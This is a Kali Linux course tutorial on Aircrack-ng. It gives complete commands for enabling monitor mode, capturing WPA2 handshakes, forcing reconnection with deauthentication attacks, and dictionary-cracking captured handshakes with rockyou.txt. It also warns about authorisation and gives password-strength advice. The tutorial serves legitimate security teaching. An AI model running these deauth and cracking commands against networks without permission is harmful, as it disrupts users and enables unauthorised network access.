DAY 11
🖥️ KALI LINUX COURSE
FREE
🖥️ KALI LINUX COURSE
FREE
Part of the 180-Day Kali Linux Mastery Course — the most complete free Kali training online
⚠️ Authorised Networks Only: Aircrack-ng must only be used on WiFi networks you own or have explicit written permission to test. Testing any other network — including open public WiFi — is illegal in most jurisdictions. All exercises in this guide use your own home network or a dedicated lab access point only.
Your WiFi password is the only thing standing between your entire home network and anyone within 100 metres with a laptop. Most people set it once, write it on a Post-it note, and never think about it again. Aircrack-ng can test whether that password would survive a real attack in under 60 seconds — if it is in any common wordlist, it will fall. Day 11 Aircrack-ng Tutorial is where wireless security gets personal.
🎯 What You’ll Master in Day 11
Put a wireless adapter into monitor mode and capture live 802.11 frames
Capture a WPA2 four-way handshake from a target access point
Force a handshake capture using a deauthentication attack
Run a dictionary attack against a captured handshake with Aircrack-ng
Understand what makes a WPA2 password genuinely resistant to cracking
⏱️ 26 min read · 3 hands-on exercises
📊 What wireless security experience are you bringing into Day 11?
✅ Perfect — this guide covers the full Aircrack-ng suite from monitor mode through cracking. Jump to the section that matches your level using the TOC.
📋 What You’ll Master in Day 11 — Aircrack-ng Tutorial
On Day 10 we used Metasploit to exploit vulnerable services identified during reconnaissance. Today we shift from wired to wireless — Aircrack-ng is the industry standard for WiFi security auditing and the tool every wireless penetration tester runs first. This is Day 11 of the 180-Day Kali Linux Mastery Course.
The Aircrack-ng Suite — Four Tools, One Workflow
Aircrack-ng is not a single tool — it is a suite of four utilities that work together in a fixed sequence. Understanding what each one does before touching the keyboard prevents the confusion that stops most beginners at the first step.
securityelites.com
Aircrack-ng Suite — Tool Roles
airmon-ng
Enables/disables monitor mode on your wireless adapter — must run first before any other tool
airodump-ng
Captures 802.11 frames — scans for networks, locks onto a target, captures WPA2 handshakes to a .cap file
aireplay-ng
Injects packets — sends deauth frames to force clients to reconnect and trigger a fresh handshake capture
aircrack-ng
Performs the dictionary/brute-force attack — tests wordlist passwords against the captured handshake hash
📸 The four Aircrack-ng suite tools in workflow order — airmon-ng → airodump-ng → aireplay-ng → aircrack-ng. Each one feeds into the next.
⚠️ Hardware Requirement: Your laptop’s built-in WiFi adapter almost certainly does not support monitor mode. You need a compatible USB wireless adapter. The Alfa AWUS036ACH or AWUS036ACM work out of the box in Kali 2026. Without a compatible adapter, you can still follow this guide conceptually — all commands and methodology apply once you have the hardware.
🧠 EXERCISE 1 — THINK LIKE A HACKER (3 MIN · NO TOOLS)
Why does WPA2 cracking require a connected client — not just the access point?
⏱️ Time: 3 minutes · No tools required
WPA2 password verification happens in a “four-way handshake”
between the client and the access point during connection.
between the client and the access point during connection.
Answer these before reading on:
1. Why can’t you crack a WPA2 password just by being near the access point?
2. What does the handshake actually contain — the password itself, or something derived from it?
3. Why does a deauth attack help the attacker even though it temporarily breaks connectivity?
4. If the password is 20 random characters, what happens when aircrack-ng runs?
✅ What you just learned: The WPA2 handshake contains a hash derived from the password, not the password itself. You need both the handshake AND a connected client because the hash is generated during the authentication exchange. Deauth forces a reconnect which re-triggers that exchange. A 20-character random password never cracks via dictionary — the attack is only effective against passwords that appear in wordlists.
📸 Write your answers and share in #day11-mindset on Discord.
Monitor Mode — Seeing All Wireless Traffic
By default, wireless adapters only process frames addressed to them. Monitor mode disables this filter — the adapter captures every 802.11 frame in range, regardless of the destination MAC address. This is the equivalent of promiscuous mode on a wired network interface.
ENABLE MONITOR MODE
# Check your wireless interface name
iwconfig
# Look for wlan0 or similar — note the name
# Kill processes that interfere with monitor mode (NetworkManager etc.)
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Interface is now wlan0mon (or mon0 on some adapters)
# Verify monitor mode is active
iwconfig wlan0mon
# Should show: Mode:Monitor
# To disable monitor mode when done:
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
💡 airmon-ng check kill: NetworkManager and wpa_supplicant constantly try to manage your wireless interface — they will interfere with packet capture and injection. Always run
sudo airmon-ng check kill before enabling monitor mode. Your internet will drop while monitor mode is active — this is expected.Handshake Capture with Airodump-ng
With monitor mode active, airodump-ng can scan all nearby access points and lock onto a specific target to capture its traffic — including the WPA2 four-way handshake when a client connects.
SCAN AND CAPTURE HANDSHAKE
# Step 1 — Scan all nearby access points
sudo airodump-ng wlan0mon
# Note: BSSID (MAC), CH (channel), ESSID (network name) of YOUR target
# Press Ctrl+C once you have noted the target’s BSSID and CH
# Step 2 — Lock onto target and capture to file
sudo airodump-ng -c [CHANNEL] –bssid [TARGET_BSSID] -w /tmp/capture wlan0mon
# Replace [CHANNEL] and [TARGET_BSSID] with values from Step 1
# e.g: sudo airodump-ng -c 6 –bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon
# Wait — when a client connects you will see in top-right:
WPA handshake: AA:BB:CC:DD:EE:FF
# This confirms the handshake was captured. Press Ctrl+C to stop.
# Verify .cap file was created
ls -lh /tmp/capture*.cap
Deauth Attack — Forcing a Handshake
Waiting for a client to naturally connect can take minutes or hours. A deauthentication attack sends forged 802.11 deauth frames to a connected client, disconnecting them from the access point. The client automatically reconnects — triggering a fresh handshake that airodump-ng captures immediately.
DEAUTH ATTACK — FORCE HANDSHAKE CAPTURE
# Run this in a SECOND terminal while airodump-ng is still capturing
# TARGET_BSSID = access point MAC, CLIENT_MAC = connected device MAC
# Deauth all clients on the access point (broadcast)
sudo aireplay-ng –deauth 5 -a [TARGET_BSSID] wlan0mon
# Deauth a specific client only (more targeted, less disruptive)
sudo aireplay-ng –deauth 5 -a [TARGET_BSSID] -c [CLIENT_MAC] wlan0mon
# –deauth 5 = send 5 deauth frames (enough to force a reconnect)
# Switch back to terminal 1 — you should now see:
WPA handshake: AA:BB:CC:DD:EE:FF
# Handshake captured. Ready to crack.
⚠️ Deauth is Disruptive: A deauthentication attack briefly disconnects every device on the target network — phones, laptops, smart TVs, everything. On your own home network for a quick test this is a minor inconvenience. Never run this on any network you do not own — it disrupts legitimate users and constitutes illegal interference with communications in most countries.
Cracking with Aircrack-ng
With a captured .cap file containing a WPA2 handshake, Aircrack-ng tests every password in a wordlist against the handshake hash. If the password is in the wordlist, it cracks. If not, it does not — there is no way around this fundamental limitation of dictionary attacks.
⚡ EXERCISE 2 — KALI TERMINAL (YOUR OWN NETWORK)
Capture a WPA2 handshake and run Aircrack-ng against it
⏱️ Time: 20 minutes · Target: Your own home WiFi network ONLY
FULL WORKFLOW — MONITOR → CAPTURE → CRACK
# 1. Enable monitor mode
sudo airmon-ng check kill && sudo airmon-ng start wlan0
# 2. Find your network’s BSSID and channel
sudo airodump-ng wlan0mon
# Press Ctrl+C after noting your network’s BSSID and CH
# 3. Capture handshake (replace values)
sudo airodump-ng -c [CH] –bssid [BSSID] -w /tmp/mynet wlan0mon
# 4. In a second terminal — force handshake with deauth
sudo aireplay-ng –deauth 3 -a [BSSID] wlan0mon
# Wait for “WPA handshake:” in terminal 1 → Ctrl+C to stop capture
# 5. Extract rockyou.txt if compressed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null; echo “ready”
# 6. Run the dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt /tmp/mynet*.cap
# If password is in rockyou.txt → KEY FOUND! [yourpassword]
# If not → Passphrase not in dictionary
✅ What you just learned: If your WiFi password appeared in rockyou.txt, you now know it needs to be changed immediately. If Aircrack-ng said “Passphrase not in dictionary” — your password is not in the most widely used wordlist in existence. That is a good sign. The goal of this exercise is to know your own exposure, not just understand the theory.
📸 Screenshot the Aircrack-ng result (blur your SSID) and share in #day11-exercise on Discord.
What Actually Stops This Attack
Aircrack-ng is only as powerful as its wordlist. Understanding the real limits of this attack is as important as knowing how to run it — both for offensive reporting and for giving clients genuine security advice.
securityelites.com
WPA2 Password Strength vs Aircrack-ng
password123
Cracks in <1 second — in rockyou.txt
summer2024
Cracks in <5 seconds — in wordlists
Tr0ub4dor&3
May crack — rule-based wordlist mutations
kX9#mQ2$vL7@pN
Will not crack — not in any dictionary
WPA3-SAE network
Aircrack-ng does not apply — use WPA3
📸 WPA2 password crackability — the attack only works if the password is in a wordlist. Randomly generated 14+ character passwords are immune to dictionary attacks.
🔥 EXERCISE 3 — KALI TERMINAL (WORDLIST ANALYSIS)
Analyse rockyou.txt and understand what percentage of common passwords it covers
⏱️ Time: 10 minutes
WORDLIST ANALYSIS COMMANDS
# How many passwords in rockyou.txt?
wc -l /usr/share/wordlists/rockyou.txt
# What are the top 20 most common passwords?
head -20 /usr/share/wordlists/rockyou.txt
# How many passwords are 8 characters or less (WPA2 minimum is 8)?
awk ‘length($0) <= 8' /usr/share/wordlists/rockyou.txt | wc -l
# How many are exactly 8 characters (most common weak WPA2 length)?
awk ‘length($0) == 8’ /usr/share/wordlists/rockyou.txt | wc -l
# Check if a specific password is in the list:
grep -c “^password123$” /usr/share/wordlists/rockyou.txt
# Returns 1 if found, 0 if not
✅ What you just learned: rockyou.txt contains 14 million real passwords from an actual data breach — these are passwords real people chose. The fact that so many are 8 characters or less explains why the WPA2 minimum length of 8 is essentially useless as a security baseline. A random 14-character password that is not in any wordlist genuinely cannot be cracked with this method regardless of hardware.
📸 Share your wordlist stats in #day11-pro on Discord. Tag #kaliday11
🧠 QUICK CHECK — Day 11
Why does a deauthentication attack help Aircrack-ng capture a WPA2 handshake faster?
📋 Commands Used Today — Day 11 Reference Card
sudo airmon-ng check kill && sudo airmon-ng start wlan0Kill interfering processes and enable monitor mode
sudo airodump-ng wlan0monScan all nearby access points
sudo airodump-ng -c [CH] –bssid [BSSID] -w /tmp/capture wlan0monLock onto target and capture handshake to file
sudo aireplay-ng –deauth 5 -a [BSSID] wlan0monSend deauth frames to force client reconnection
aircrack-ng -w /usr/share/wordlists/rockyou.txt /tmp/capture*.capDictionary attack against captured WPA2 handshake
sudo airmon-ng stop wlan0mon && sudo systemctl start NetworkManagerDisable monitor mode and restore network connectivity
🏆 Mark Day 11 as Complete
You now audit WiFi security like a professional. Lock in your progress.
❓ Frequently Asked Questions – Aircrack-ng Tutorial
What is Aircrack-ng used for?
Aircrack-ng is a complete wireless security auditing suite pre-installed in Kali Linux. It captures WPA/WPA2 handshakes, performs dictionary attacks against them, tests WEP encryption, and monitors 802.11 wireless traffic. It is used by penetration testers to audit WiFi password strength on networks they are authorised to test.
Is using Aircrack-ng legal?
Legal on networks you own or have explicit written authorisation to test. Illegal on any other network — including open public WiFi, neighbour’s networks, or corporate networks without a signed scope of work. Always test only your own equipment or within a controlled lab environment.
Does Aircrack-ng work against WPA3?
No. WPA3 uses SAE (Simultaneous Authentication of Equals) which does not produce a reusable handshake hash. Aircrack-ng’s dictionary attack method cannot be applied to WPA3. This is the primary security advantage of WPA3 over WPA2 — it is immune to offline password cracking attacks.
What wireless adapter works best with Kali 2026?
The Alfa AWUS036ACH and AWUS036ACM work out of the box with Kali Linux 2026 and support both monitor mode and packet injection without additional drivers. The TP-Link TL-WN722N version 1 (original v1 only — not v2/v3) is a budget alternative. Most built-in laptop adapters do not support monitor mode.
How long does cracking take?
Speed depends on hardware and wordlist. With rockyou.txt on a modern CPU: passwords in the list crack in seconds. Passwords not in any wordlist never crack via this method — the attack has a hard ceiling defined by what is in your wordlist. GPU acceleration with Hashcat can test hundreds of millions of passwords per second but still cannot crack truly random long passwords.
What comes after Aircrack-ng in this course?
Day 12 covers Burp Suite — the industry standard web application security testing proxy. Moving from wireless to web application testing is a natural progression, as most modern attack surfaces are web-based rather than wireless.
← Previous
Day 10: Metasploit Framework
Next →
Day 12: Burp Suite
📚 Further Reading
- Day 10: Metasploit Framework — The exploitation framework that uses intelligence gathered in recon phases to identify and exploit vulnerable services on wired networks.
- Kali Linux Commands Cheat Sheet 2026 — Essential reference for all Kali tools including the full Aircrack-ng suite flags and common wireless auditing workflows.
- Passive vs Active Reconnaissance 2026 — Wireless auditing context — where Aircrack-ng fits in the full penetration testing methodology.
- Aircrack-ng Official Documentation — Complete reference for all suite tools including advanced techniques like PMKID attacks, WEP cracking, and custom rule-based attacks.
- Wi-Fi Alliance: WPA3 Security Guide — Official WPA3 specification and security overview — understanding WPA3’s SAE defence explains exactly why Aircrack-ng cannot apply to WPA3 networks.
Leave a Reply